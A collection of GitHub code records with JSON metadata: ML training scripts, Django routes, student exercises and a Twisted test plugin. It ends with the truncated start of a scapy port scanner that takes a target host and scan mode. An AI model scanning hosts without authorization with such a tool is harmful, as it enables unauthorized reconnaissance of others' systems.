if method_name in before_target_methods:\n before_target_methods[method_name](*args, **kwargs)\n\n result = source_methods[method_name](*args, **kwargs)\n\n if method_name in after_target_methods:\n after_target_methods[method_name](*args, **kwargs)\n return result\n\n setattr(source_bind_cls, method_name, decorated_method)\n return source_bind_cls\n return decorator\n","repo_name":"Gamazic/python-explicit-aspect","sub_path":"aspect/targets.py","file_name":"targets.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15762158506","text":"# def my_pow(number, degree):\n# if degree <= 1:\n# return number\n#\n# return number * my_pow(number, degree - 1)\n#\n# print(my_pow(3, 3))\n# # my_pow(3, 3) => 3 * my_pow(3,2) => 27\n# # my_pow(3, 2) => 3 * my_pow(3,1) => 9\n# # my_pow(3, 1) => 3\n\ndef sum_range(a, b):\n\n if a > b:\n\n return 0\n\n return a + sum_range(a+1, b)\n\n\n\nprint(sum_range(2, 5))\n\n# sum_range(2, 5) => 2 + 3 => 5\n# sum_range(2, 5) => 4+ 5 => 9\n","repo_name":"steranoksana/Homework-lesson-8","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25846417062","text":"#Bansari Shah\r\n#ICS3U0\r\n#Palindrome; page 267\r\n#27 Oct 2020\r\n\r\nstring = input(\"Enter Text: \")\r\nmid = (len(string) // 2)\r\n\r\nPalindrome = True\r\nfor index in range(mid):\r\n if string[index] != string[- (index + 1)]: \r\n Palindrome = False\r\n break\r\nif Palindrome == True:\r\n print(True)\r\nelse:\r\n print(False)\r\n\r\n############################################\r\n##string = input().split()\r\n##string.lower()\r\n##print(string)\r\n##word = []\r\n##for char in string:\r\n## for i in range(len(char)):\r\n## word.append(char[i])\r\n##Palindrome = True\r\n##for index in range((len(word)//2)):\r\n## if word[index] != word[- (index + 1)]: \r\n## Palindrome = False\r\n## break\r\n##if Palindrome == True:\r\n## print(True)\r\n##else:\r\n## print(False)\r\n##\r\n##\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"bxnsari2312/Small-Games","sub_path":"SIMPLE-GAME_OR_APPLICATIONS/Palindrome; Page 269.py","file_name":"Palindrome; Page 269.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27436228475","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\n\nfrom .views import OrgView, AddUserRequestView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView\n\nurlpatterns = [\n\t# 明星学校列表首页\n\turl(r'^list/$', OrgView.as_view(), name='org_list'),\n\turl(r'^add_request/$', AddUserRequestView.as_view(), name=\"add_request\"),\n\turl(r'^home/(?P\\d+)/$', OrgHomeView.as_view(), name=\"org_home\"),\n\turl(r'^course/(?P\\d+)/$', OrgCourseView.as_view(), name=\"org_course\"),\n url(r'^desc/(?P\\d+)/$', OrgDescView.as_view(), name=\"org_desc\"),\n\turl(r'^teacher/(?P\\d+)/$', OrgTeacherView.as_view(), name=\"org_teacher\"),\n\t# 学校收藏\n\turl(r'^add_fav/$', AddFavView.as_view(), name=\"add_fav\"),\n]\n","repo_name":"mingsquall/django-cloud-edu-platform","sub_path":"k12online/apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6764078808","text":"import pandas as pd\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom nltk.probability import FreqDist\nfrom WordModel.wordAccuracy import WordAccuracyTesting\nfrom PhraseModel.phraseAccuracy import PhraseAccuracyTesting\nimport statistics\nps = PorterStemmer()\n\nclass OverallScore:\n\n def __init__(self, testing_data):\n self.outputDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Overall Score\"])\n self.phraseDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Phrase Score\"])\n self.wordDf = pd.DataFrame(columns=[\"Sentiment\",\"Message\",\"Actual Score\",\"Predicted Word Score\"])\n self.phraseAccuracy = PhraseAccuracyTesting()\n self.wordAccuracy = WordAccuracyTesting()\n self.testing_data = testing_data\n\n def runScores(self, sentimentPhrases, sentiments, x, y, runWordAccuracy, runPhraseAccuracy):\n numRight = 0\n totalCases = self.testing_data.shape[0]\n for i in range(0,self.testing_data.shape[0]):\n sentiment = self.testing_data['SentimentName'][i]\n sentiment = sentiment.upper()\n message = self.testing_data['Messages'][i]\n message = message.lower()\n correctScore = self.testing_data['ManualScore'][i]\n wordResults = [None, None, None, None]\n phraseResults = [None, None, None, None]\n if runWordAccuracy == True:\n wordResults = self.wordAccuracy.runAccuracyTest(sentiments, sentiment, message, correctScore)\n if runPhraseAccuracy == True:\n phraseResults = self.phraseAccuracy.runAccuracyTest(sentimentPhrases, sentiment, message, correctScore)\n score = self.getOverallScore(wordResults, phraseResults, x, y)\n if wordResults[2] == True and phraseResults[2] == True:\n totalCases-=1\n print(\"Did not find \", sentiment, \" in trained model with \", len(sentimentPhrases), \" sentiments\")\n elif wordResults[3] == True and phraseResults[3] == True:\n totalCases-=1\n #print('No sentiment score for this message.')\n if score == correctScore:\n numRight+=1\n self.outputDf = self.outputDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Overall Score': score}, ignore_index=True)\n self.phraseDf = self.phraseDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Phrase Score': phraseResults[1]}, ignore_index=True)\n self.wordDf = self.wordDf.append({'Sentiment': sentiment, 'Message':message, 'Actual Score': correctScore, 'Predicted Word Score': wordResults[1]}, ignore_index=True)\n \n print(totalCases)\n print(numRight)\n answerPercent = (numRight/totalCases) * 100\n self.outputDf.to_excel('score.xlsx')\n self.phraseDf.to_excel('phraseScore.xlsx')\n self.wordDf.to_excel('wordScore.xlsx')\n testing = [answerPercent, x, y]\n print(testing)\n return testing\n\n def getOverallScore(self, wordResults, phraseResults, x, y):\n wordScore = 0\n phraseScore = 0\n if wordResults[0] != None:\n wordScore = wordResults[1]\n if phraseResults[0] != None:\n phraseScore = phraseResults[1]\n score = ((wordScore*x)+(phraseScore*y)) / 100\n return round(score)\n\n","repo_name":"saarangbond/ML-MessageScoring","sub_path":"overall.py","file_name":"overall.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"33215427278","text":"import sys\nimport heapq\n\nn = int(sys.stdin.readline().rstrip())\ntotal = 0\nheap = []\nfor _ in range(n):\n num = int(sys.stdin.readline().rstrip())\n heapq.heappush(heap, num)\n# 우선순위 정렬\n\nwhile len(heap) > 1:\n num1 = heapq.heappop(heap)\n num2 = heapq.heappop(heap)\n total += num1 + num2\n # 힙 안에 두 개 이상 수가 남아 있다면 최솟값 두 개를 합하는 게 가장 작은 수를 구하는 방법\n heapq.heappush(heap, num1+num2)\n\nprint(total)","repo_name":"PJunyeong/Coding-Test","sub_path":"Baekjoon/1715_카드 정렬하기.py","file_name":"1715_카드 정렬하기.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"312498596","text":"# -*- python -*-\n\"\"\" Test plugin for testing commands sent directly to the server \"\"\"\nfrom __future__ import absolute_import, division, print_function\n\n#import traceback\n\nfrom twisted.internet.defer import Deferred\n\nfrom lumina.plugin import Plugin\nfrom lumina.node import Node\nfrom lumina.message import Message\nfrom lumina.exceptions import ConfigException\n\n\n# To test this plugin, use config conf/tests/server_command.json\n\nclass ServerCommand(Node):\n \"\"\" (TEST) A plugin for generating server commands as direct requests \"\"\"\n\n\n def setup(self):\n self.status.set_GREEN()\n\n self.master_server = self.master.get_plugin_by_module('server')\n if not self.master_server:\n raise ConfigException(\"Not running on the server\")\n\n self.runner = self.execute()\n self.master.reactor.callLater(4, self.do_next)\n\n\n\n def execute(self):\n cmds = (\n ('nonexist', 101), # Test nonexisting command\n ('_name', 102), # Local command\n\n ('cmd/1', 201), # Remote command\n ('cmd/error', 202), # Remote command with error\n ('cmd/timeout', 203), # Remote command that returns TimeoutException\n ('cmd/never', 204), # Test a command that timeout the link\n ('cmd/2', 205), # Remote command\n\n ('group/local', 301), # Local group\n ('group/123', 302), # Remote group\n ('group/fail', 303), # Group with failure\n ('group/nonexist', 304), # Group with failure\n )\n\n for c in cmds:\n yield ('DIRECT', self.master_server.run_command, c)\n yield ('REMOTE', self.send, c)\n\n \n def do_next(self):\n try:\n n = self.runner.next()\n self.send_cmd(*n)\n except StopIteration:\n self.master.reactor.stop()\n\n\n def send_cmd(self, text, fn, cmd):\n ''' Send command to server and print the response '''\n self.log.info(' ')\n self.log.info(' ')\n self.log.info('---{t} #{n}--------------------------------', t=text, n=cmd[1])\n m = Message.create('command', cmd[0], *cmd[1:])\n self.log.info('COMMAND: {m}', m=m)\n try:\n d = fn(m)\n self.log.info(' 1) RESULT : {d}', d=d)\n except Exception as e:\n self.log.info(' 1) FAILED IMMEDIATELY: {c}, {e}', c=e.__class__.__name__, e=e)\n d = None\n #self.log.info('TB={tb}', tb=traceback.format_exc())\n self.log.info(' 1) MESSAGE: {m}', m=m)\n\n if not isinstance(d, Deferred):\n self.log.info('-----------------------------------------------')\n self.do_next()\n return\n\n def ok(result):\n self.log.info(' 2) OK RESULT: {r}', r=result)\n def err(failure):\n self.log.info(' 2) ERR RESULT: {r}', r=failure)\n def both(ign):\n self.log.info(' 2) MESSAGE : {m}', m=m)\n self.log.info('-----------------------------------------------')\n self.do_next()\n\n d.addCallback(ok)\n d.addErrback(err)\n d.addBoth(both)\n\n\nPLUGIN = ServerCommand\n","repo_name":"sveinse/lumina","sub_path":"lumina/plugins/test/server_command.py","file_name":"server_command.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"20187601138","text":"import sys\nsys.path.insert(0,'caffe_ext/python');\nimport utils as ut;\nfrom multiprocessing import Process, Queue, Pool\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, subprocess, time, math, random, shutil, signal, glob, re\nfrom caffe import layers as L, params as P, to_proto, NetSpec, get_solver, Net\nfrom caffe.proto import caffe_pb2\nimport caffe\nimport deepcontext_config\n\n# Basic Configuration\npatch_sz=(96,96) # size of sampled patches\nbatch_sz=512 # max patches in a single batch\ngap = 48 # gap between patches\nnoise = 7 # jitter by at most this many pixels\n\ndef netset(n, nm, l):\n setattr(n, nm, l);\n return getattr(n,nm);\n\ndef conv_relu(n, bottom, name, ks, nout, stride=1, pad=0, group=1, \n batchnorm=False, weight_filler=dict(type='xavier')):\n conv = netset(n, 'conv'+name, L.Convolution(bottom, kernel_size=ks, stride=stride, \n num_output=nout, pad=pad, group=group, \n weight_filler=weight_filler))\n convbatch=conv;\n if batchnorm:\n batchnorm = netset(n, 'bn'+name, L.BatchNorm(conv, in_place=True, \n param=[{\"lr_mult\":0},{\"lr_mult\":0},{\"lr_mult\":0}]));\n convbatch = batchnorm\n # Note that we don't have a scale/shift afterward, which is different from\n # the original Batch Normalization layer. Using a scale/shift layer lets\n # the network completely silence the activations in a given layer, which\n # is exactly the behavior that we need to prevent early on.\n relu=netset(n, 'relu'+name, L.ReLU(convbatch, in_place=True))\n return conv, relu \n\ndef fc_relu(n, bottom, name, nout, batchnorm=False):\n fc = netset(n, 'fc'+name, L.InnerProduct(bottom, num_output=nout, \n weight_filler = dict(type='xavier')))\n fcbatch=fc;\n if batchnorm:\n batchnorm = netset(n, 'bn'+name, L.BatchNorm(fc, in_place=True,\n param=[{\"lr_mult\":0},{\"lr_mult\":0},{\"lr_mult\":0}]));\n fcbatch = batchnorm\n relu = netset(n, 'relu'+name, L.ReLU(fcbatch, in_place=True));\n return fc, relu\n\ndef max_pool(bottom, ks, stride=1):\n return L.Pooling(bottom, pool=P.Pooling.MAX, kernel_size=ks, stride=stride)\n\ndef caffenet_stack(data, n, use_bn=True):\n conv_relu(n, data, '1', 11, 96, stride=4, pad=5)\n n.pool1 = max_pool(n.relu1, 3, stride=2)\n n.norm1 = L.LRN(n.pool1, local_size=5, alpha=1e-4, beta=0.75)\n conv_relu(n, n.norm1, '2', 5, 256, pad=2)\n n.pool2 = max_pool(n.relu2, 3, stride=2)\n n.norm2 = L.LRN(n.pool2, local_size=5, alpha=1e-4, beta=0.75)\n conv_relu(n, n.norm2, '3', 3, 384, pad=1, batchnorm=use_bn)\n conv_relu(n, n.relu3, '4', 3, 384, pad=1, batchnorm=use_bn)\n conv_relu(n, n.relu4, '5', 3, 256, pad=1, batchnorm=use_bn)\n n.pool5 = max_pool(n.relu5, 3, stride=2)\n fc_relu(n, n.pool5, '6', 4096, batchnorm=use_bn)\n\ndef gen_net(batch_size=512, use_bn=True):\n n=NetSpec();\n n.data = L.DummyData(shape={\"dim\":[batch_size,3,96,96]})\n n.select1 = L.DummyData(shape={\"dim\":[2]})\n n.select2 = L.DummyData(shape={\"dim\":[2]})\n n.label = L.DummyData(shape={\"dim\":[2]})\n caffenet_stack(n.data, n, use_bn)\n n.first = L.BatchReindex(n.relu6, n.select1)\n n.second = L.BatchReindex(n.relu6, n.select2)\n n.fc6_concat=L.Concat(n.first, n.second);\n\n fc_relu(n, n.fc6_concat, '7', 4096, batchnorm=use_bn);\n fc_relu(n, n.relu7, '8', 4096);\n n.fc9 = L.InnerProduct(n.relu8, num_output=8,\n weight_filler=dict(type='xavier'));\n n.loss = L.SoftmaxWithLoss(n.fc9, n.label, loss_param=dict(normalization=P.Loss.NONE));\n\n prot=n.to_proto()\n prot.debug_info=True\n return prot;\n\n# image preprocessing. Note that the input image will modified.\ndef prep_image(im):\n\n # for some patches, randomly downsample to as little as 100 total pixels\n if(random.random() < .33):\n origsz=im.shape\n randpix=int(math.sqrt(random.random() * (95 * 95 - 10 * 10) + 10 * 10))\n im=caffe.io.resize(im.astype(np.uint8), (randpix, randpix))\n im=(caffe.io.resize(im, (origsz[0], origsz[1])) * 255).astype(np.float32)\n\n # randomly drop all but one color channel\n chantokeep=random.randint(0, 2);\n mean=[123, 117, 104]\n for i in range(0, 3):\n if i==chantokeep:\n im[:,:,i]-=np.mean(im[:,:,i])\n else:\n im[:,:,i]=np.random.uniform(0, 1, (im.shape[0], im.shape[1])) - .5\n\n # Normalize the mean and variance so that gradients are a less useful cue;\n # then scale by 50 so that the variance is roughly the same as the usual\n # AlexNet inputs.\n im=im / np.sqrt(np.mean(np.square(im))) * 50\n return im.transpose(2, 0, 1)\n\n# Sample a patch. This function defines a grid over the image of patches\n# of size patch_sz with a gap of gap between the patches. The upper-left\n# corner of the grid starts at (gridstartx, gridstarty). We then sample\n# the patch at location (x, y) on this grid, jitter by up to noisehalf in\n# every direction. im_shape is the dimensions of the image; an error\n# is thrown if (x, y) refers to a patch outside the image frame. \n#\n# Returns the coordinates of the sampled patch's upper left corner.\ndef sample_patch(x, y, gridstartx, gridstarty, patch_sz, gap, noisehalf, \n im_shape):\n xpix = gridstartx + x * (patch_sz[1] + gap) \\\n + random.randint(-noisehalf, noisehalf)\n xpix2 = min(max(xpix, 0), im_shape[1] - patch_sz[1])\n ypix = gridstarty + y * (patch_sz[0] + gap) \\\n + random.randint(-noisehalf, noisehalf)\n ypix2 = min(max(ypix, 0), im_shape[0] - patch_sz[0])\n assert abs(xpix - xpix2) < gap\n assert abs(ypix - ypix2) < gap\n return (xpix2 , ypix2)\n\n# A background thread which loads images, extracts pairs of patches, arranges\n# them into batches.\n#\n# args:\n# dataq: A queue object where the batches of data will be sent. Batches\n# consist of a tuple of: \n# (1) a 4-d array of of N patches, or a filename of\n# a file containing the data,\n# (2) a list of pairs of patches to be used as training examples, kept in\n# an array of shape N-by-2,\n# (3) an array of labels for each pair, which are in the range 0-7.\n#\n# batch_sz: max number of patches go in each batch\n# imgs: a list of images (see load_imageset)\n# tmpdir: if not None, data batches will be saved here and the resulting\n# filename will be sent through the queue rather than the data. \n# seed: a seed for the random number generator, required so that different\n# processes produce images in a different order:\n# tid: thread id for use in filenames.\n# patch_sz: size of sampled patches\ndef imgloader(dataq, batch_sz, imgs, tmpdir, seed, tid, patch_sz): \n qctr = 0\n curidx = 0\n # order for going through the images\n np.random.seed(seed)\n imgsord=np.random.permutation(len(imgs['filename']))\n # sample this many grids per image \n num_grids = 4\n gridctr = 0\n # storage for the sampled batch\n perm = []\n label = []\n pats = []\n # index within the current batch\n j = 0;\n # keep returning batches forever. Each iteration of this loop\n # samples one grid of patches from an image.\n while True:\n # if we've already sampled num_grids in this image, we sample a new one.\n if(gridctr==0):\n while True:\n try:\n im=ut.get_resized_image(imgsord[curidx % len(imgs['filename'])],\n imgs,\n {\"gri_targpixels\":random.randint(150000,450000)})\n except:\n curidx = (curidx + 1) % (len(imgsord))\n print(\"broken image id \" + str(curidx))\n continue;\n curidx = (curidx + 1) % (len(imgsord));\n if(im.shape[0] > patch_sz[0] * 2 + gap + noise and \n im.shape[1] > patch_sz[1] * 2 + gap + noise):\n break\n gridctr = num_grids;\n # compute where the grid starts, and then comptue its size.\n gridstartx = random.randint(0, patch_sz[1] + gap - 1)\n gridstarty = random.randint(0, patch_sz[0] + gap - 1)\n gridszx = int((im.shape[1] + gap-gridstartx) / (patch_sz[1] + gap))\n gridszy = int((im.shape[0] + gap-gridstarty) / (patch_sz[0] + gap))\n # Whenever we sample and store a patch, we'll put its index in this\n # variable so it's easy to pair it up later.\n grid=np.zeros((gridszy, gridszx), int)\n\n # if we can't fit the current grid into the batch without going over\n # batch_sz, put the batch in the queue and reset.\n if(gridszx * gridszy + j >= batch_sz):\n pats=map(prep_image, pats)\n data=np.array(pats)\n qctr+=1\n perm=(np.array(perm))\n label=(np.array(label))\n if tmpdir is None:\n dataq.put((np.ascontiguousarray(data), perm, label), timeout=600)\n else:\n fnm=tmpdir + str(tid) + '_' + str(qctr) + '.npy'\n np.save(fnm, data)\n dataq.put((fnm, perm, label), timeout=600)\n perm=[]\n label=[]\n pats=[]\n j=0\n\n gridctr-=1;\n # for each location in the grid, sample a patch, search up and to the\n # left for patches that can be paired with it, and add them to the batch.\n for y in range(0,gridszy):\n for x in range(0,gridszx):\n (xpix, ypix)=sample_patch(x, y, gridstartx, gridstarty, patch_sz, \n gap, noise, im.shape)\n pats.append(np.copy(\n im[ypix:ypix + patch_sz[0], xpix:xpix + patch_sz[1], :]*255));\n grid[y, x] = j;\n for pair in [(-1,-1), (0,-1), (1,-1), (-1,0)]:\n gridposx = pair[0] + x;\n gridposy = pair[1] + y;\n if(gridposx < 0 or gridposy < 0 or gridposx >= gridszx):\n continue;\n perm.append(np.array([j, grid[gridposy, gridposx]]));\n label.append(pos2lbl(pair));\n perm.append(np.array([grid[gridposy, gridposx],j]))\n label.append(pos2lbl((-pair[0],-pair[1])));\n j+=1;\n\n# convert an (x, y) offset into a single number to use as a label. Labels are:\n# 1 2 3\n# 4 5\n# 6 7 8\ndef pos2lbl(pos):\n (posx, posy)=pos;\n if(posy==-1):\n lbl = posx + 1;\n elif(posy == 0):\n lbl = (posx + 7) / 2\n else:\n assert(posy == 1);\n lbl = posx + 6;\n return lbl;\n\n# will set these later, need to make it global for signal handler\nif 'exp_name' not in locals():\n exp_name='';\ndef signal_handler(signal, frame):\n print(\"PYCAFFE IS NOT GUARANTEED TO RETURN CONTROL TO PYTHON WHEN \" +\n \"INTERRUPTED. That means I can't necessarily clean up temporary files \" +\n \"and spawned processes. \" +\n \"You were lucky this time. Run deepcontext_quit() to quit. Next time touch \" + \n exp_name + '_pause to pause safely and ' + exp_name + '_quit to quit.')\n\n# return a dict containing two fields 'dir' (a string) and 'filename' (a list \n# of strings) such that\n# scipy.misc.imread(imgs['dir'] + imgs['filename'][idx]) will return\n# an image. Make sure the order of imgs['filename'] is deterministic, since\n# the code uses the index in this list as an ID for each image.\ndef load_imageset():\n datadir=deepcontext_config.imagenet_dir;\n imgs={};\n imgs['dir']=datadir+'train/';\n names=[];\n with open(datadir + 'train.txt', 'rb') as f:\n for line in f:\n row=line.split();\n names.append(row[0]);\n imgs['filename']=names;\n return imgs;\n\n# The main code body. \ntry:\n if 'solver' not in locals():\n exp_name=ut.mfilename();\n # all generated files will be here.\n outdir = deepcontext_config.out_dir + '/' + exp_name + '_out/';\n if deepcontext_config.tmp_dir:\n tmpdir = deepcontext_config.tmp_dir + '/' + exp_name + '_out/';\n else:\n tmpdir = None\n if not os.path.exists(outdir):\n os.mkdir(outdir);\n else:\n try:\n input=raw_input;\n except:\n pass;\n print('=======================================================================');\n print('Found old data. Load most recent snapshot and append to log file (y/N)?');\n inp=input('======================================================================');\n if not 'y' == inp.lower():\n raise RuntimeError(\"User stopped execution\");\n \n if not os.path.exists(tmpdir):\n os.makedirs(tmpdir);\n # by default, we append to the logfile if it's already there.\n #if os.path.exists(outdir + \"out.log\"):\n # os.remove(outdir + \"out.log\")\n\n # Magic commands to redirect standard output and standard\n # error to a log file for easy plotting of the loss function. Note that\n # running these commands will screw up your terminal; hence why the whole\n # code is wrapped in a try/finally statement that puts things back the way\n # they were.\n prevOutFd = os.dup(sys.stdout.fileno())\n prevErrFd = os.dup(sys.stderr.fileno()) \n tee = subprocess.Popen([\"tee\", \"-a\", outdir + \"out.log\"], stdin=subprocess.PIPE)\n os.dup2(tee.stdin.fileno(), sys.stdout.fileno())\n os.dup2(tee.stdin.fileno(), sys.stderr.fileno())\n\n # if the solver hasn't been set up yet, do so now. Otherwise assume that \n # we're continuing.\n if 'solver' not in locals():\n if os.path.isfile(exp_name + '_pause'):\n os.remove(exp_name + '_pause')\n if os.path.isfile(exp_name + '_quit'):\n os.remove(exp_name + '_quit')\n\n with open(outdir+'network.prototxt','w') as f:\n f.write(str(gen_net()));\n with open(outdir+'network_no_bn.prototxt','w') as f:\n f.write(str(gen_net(use_bn=False)));\n\n ut.mkorender('solver_mko.prototxt', outdir + 'solver.prototxt', \n base_lr=1e-5, outdir=outdir, weight_decay=0)\n\n print('setting gpu')\n caffe.set_mode_gpu();\n print('constructing solver')\n solver = caffe.get_solver(outdir + 'solver.prototxt');\n\n # Find earlier solvers and restore them\n fils=glob.glob(outdir + 'model_iter_*.solverstate');\n if(len(fils)>0):\n idxs=[];\n for f in fils:\n idxs.append(int(re.findall('\\d+',os.path.basename(f))[0]));\n idx=np.argmax(np.array(idxs));\n solver.restore(outdir + os.path.basename(fils[idx]));\n\n # we occasionally read out the parameters in this list and save the norm\n # of the update out to disk, so we can make sure they're updating at\n # the right speed.\n track=[];\n for bl in solver.net.params:\n if not 'bn' in bl:\n track.append(bl);\n nrm=dict();\n intval={};\n trackold={};\n for tracknm in track:\n intval[tracknm]=[];\n nrm[tracknm]=[];\n\n curstep = 0;\n\n # load the images\n imgs=load_imageset();\n\n # start the data prefetching threads.\n dataq=[]\n procs=[]\n i=0\n for i in range(0,3):\n dataq.append(Queue(5))\n procs.append(Process(target=imgloader, \n args=(dataq[-1], batch_sz, imgs, tmpdir,\n (hash(outdir)+i) % 1000000, #random seed\n i, patch_sz)))\n procs[-1].start()\n def deepcontext_quit():\n for proc in procs:\n proc.terminate()\n time.sleep(2)\n shutil.rmtree(tmpdir)\n os.kill(os.getpid(), signal.SIGKILL)\n signal.signal(signal.SIGINT, signal_handler)\n \n # The main loop over batches.\n while True:\n start=time.time();\n (datafnm, perm, label)=dataq[curstep % len(dataq)].get(timeout=600)\n print(\"queue size: \" + str(dataq[curstep % len(dataq)].qsize()))\n\n if(tmpdir is None):\n d=datafnm\n else:\n d=np.load(datafnm,mmap_mode='r')\n os.remove(datafnm)\n\n # input the patch data\n solver.net.blobs['data'].reshape(*d.shape)\n solver.net.blobs['data'].data[:]=d[:]\n\n # input the patch pairings\n solver.net.blobs['select1'].reshape(*(perm.shape[0],))\n solver.net.blobs['select1'].data[:]=perm[:,0]\n solver.net.blobs['select2'].reshape(*(perm.shape[0],))\n solver.net.blobs['select2'].data[:]=perm[:,1]\n\n # input the labels\n solver.net.blobs['label'].reshape(*label.shape)\n solver.net.blobs['label'].data[:]=label\n\n print(\"data input time: \" + str(time.time()-start));\n\n # take a step\n solver.step(1)\n print(\"norm_loss: \" + str(solver.net.blobs['loss'].data /\n (label.shape[0])));\n print(\"solver step time: \" + str(time.time() - start));\n dobreak=False;\n broken=[];\n \n msg = (' Please examine the situation and re-execute ' + exp_name + \n '.py to continue.')\n if curstep % 100 == 0:\n start = time.time()\n print(\"getting param statistics...\")\n for tracknm in track:\n try:\n intval[tracknm].append(np.sqrt(np.sum(np.square(\n solver.net.params[tracknm][0].data - trackold[tracknm]))));\n if (intval[tracknm][-1] > 10 * intval[tracknm][-2] \n and curstep > 100) \\\n or np.isnan(intval[tracknm][-1]):\n print(tracknm + \" changed a suspiciously large amount.\" + msg)\n dobreak = True; \n broken.append(tracknm);\n except:\n print(\"init \" + tracknm + \" statistics\")\n trackold[tracknm]=np.copy(solver.net.params[tracknm][0].data);\n nrmval=np.sqrt(np.sum(solver.net.params[tracknm][0].data * \n solver.net.params[tracknm][0].data))\n nrm[tracknm].append(nrmval);\n np.save(outdir + 'intval',intval);\n np.save(outdir + 'nrm',nrm);\n print(\"param statistics time: \" + str(time.time()-start));\n\n val = np.sum(solver.net.params[\"fc8\"][0].data);\n if np.isnan(val) or val > 1e10:\n print(\"fc8 activations look broken to me.\" + msg)\n dobreak = True;\n val2 = np.max(np.abs(solver.net.blobs[\"pool1\"].diff));\n if np.isnan(val2) or val2 > 1e8:\n print(\"pool1 diffs look broken to me.\" + msg)\n dobreak = True;\n\n curstep += 1;\n if dobreak:\n break;\n if os.path.isfile(exp_name + '_pause'):\n break;\n if os.path.isfile(exp_name + '_quit'):\n # Need to kill the subprocesses and delete the temporary files.\n deepcontext_quit();\nexcept KeyboardInterrupt:\n if 'procs' in locals():\n handler(None,None)\n raise;\nfinally:\n if 'prevOutFd' in locals():\n os.dup2(prevOutFd, sys.stdout.fileno())\n os.close(prevOutFd)\n os.dup2(prevErrFd, sys.stderr.fileno())\n os.close(prevErrFd)\n","repo_name":"cdoersch/deepcontext","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17965,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"50"} +{"seq_id":"42302236399","text":"import tensorflow as tf\nfrom Core.Task import Task\nimport os\nfrom food101 import get_food101_data\nfrom tensorflow.keras.callbacks import ModelCheckpoint, CSVLogger\nfrom tools.visualization.training_visualization_tool import plot_training_result\nfrom cyclic import CyclicLR\n\n\nclass Food101Task(Task):\n def __init__(self, config):\n super().__init__(config)\n\n def prepare_model(self, type=\"vgg16\", filename=None):\n if filename is not None:\n foldername = self.config['Model']['model_folder']\n filename = os.path.join(foldername, filename)\n model = tf.keras.models.load_model(filename)\n return model\n else:\n if type == \"vgg16\":\n from vgg16 import VGG16 \n model = VGG16(input_shape=[224, 224, 3], num_classes=20)\n elif type == \"resnet\":\n from resnet import ResNet50\n model = ResNet50(input_shape=[224, 224, 3], num_classes=20)\n elif type == \"mobilenet_v2\":\n from mobilenet_v2 import MobileNetV2_avg_max\n model = MobileNetV2_avg_max(input_shape=[224, 224, 3], num_classes=20)\n return model\n \n def get_dataset(self):\n ds_path = self.config['Datasets']['dataset_folder']\n train_data, valid_data = get_food101_data(\n dataset_dir=ds_path,\n bs=32)\n return train_data, valid_data\n \n def train(self, model, model_name='fine_tuned_model.h'):\n train_data, valid_data = self.get_dataset()\n foldername = self.config['Model']['model_folder']\n acc1 = tf.keras.metrics.TopKCategoricalAccuracy(\n k=1, name=\"top1\", dtype=None)\n acc5 = tf.keras.metrics.TopKCategoricalAccuracy(\n k=5, name='top_k_categorical_accuracy', dtype=None)\n\n initial_learning_rate = 1e-5\n maximal_learning_rate = 1e-3\n NUM_CLR_CYCLES = 2\n step_size = train_data.n/NUM_CLR_CYCLES/2\n\n opt = tf.keras.optimizers.SGD(lr=initial_learning_rate, momentum=0.9)\n clr = CyclicLR(\n base_lr=initial_learning_rate,\n max_lr=maximal_learning_rate,\n step_size=step_size)\n\n model.compile(\n optimizer=opt,\n loss=\"categorical_crossentropy\",\n metrics=[acc1, acc5])\n\n checkpointer = ModelCheckpoint(\n filepath=foldername,\n verbose=1,\n monitor='val_top1',\n mode='max',\n save_best_only=True)\n\n early_stopper = tf.keras.callbacks.EarlyStopping(\n monitor=\"val_top1\", patience=3, mode=\"max\"\n )\n csv_logger = CSVLogger(csv_path)\n with tf.device('/gpu:0'):\n history = model.fit_generator(\n train_data,\n validation_freq=1,\n validation_data=valid_data,\n epochs=30,\n verbose=1,\n callbacks=[csv_logger, checkpointer, clr, early_stopper])\n\n plot_training_result(history, clr, foldername)\n model.save(os.path.join(foldername, \"trained_model.h5\"))","repo_name":"wei2374/model_compression","sub_path":"demo/food20/Food101Task.py","file_name":"Food101Task.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11697775535","text":"import os\nimport sys\nimport logging\nimport socket\nfrom scapy.all import *\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nsrc_port = RandShort()\n\n# Take arguments\ntry: \n TARGET_HOST = sys.argv[1]\n SCAN_MODE = sys.argv[2]\nexcept IndexError:\n print(\"Usage: python port_scanner.py 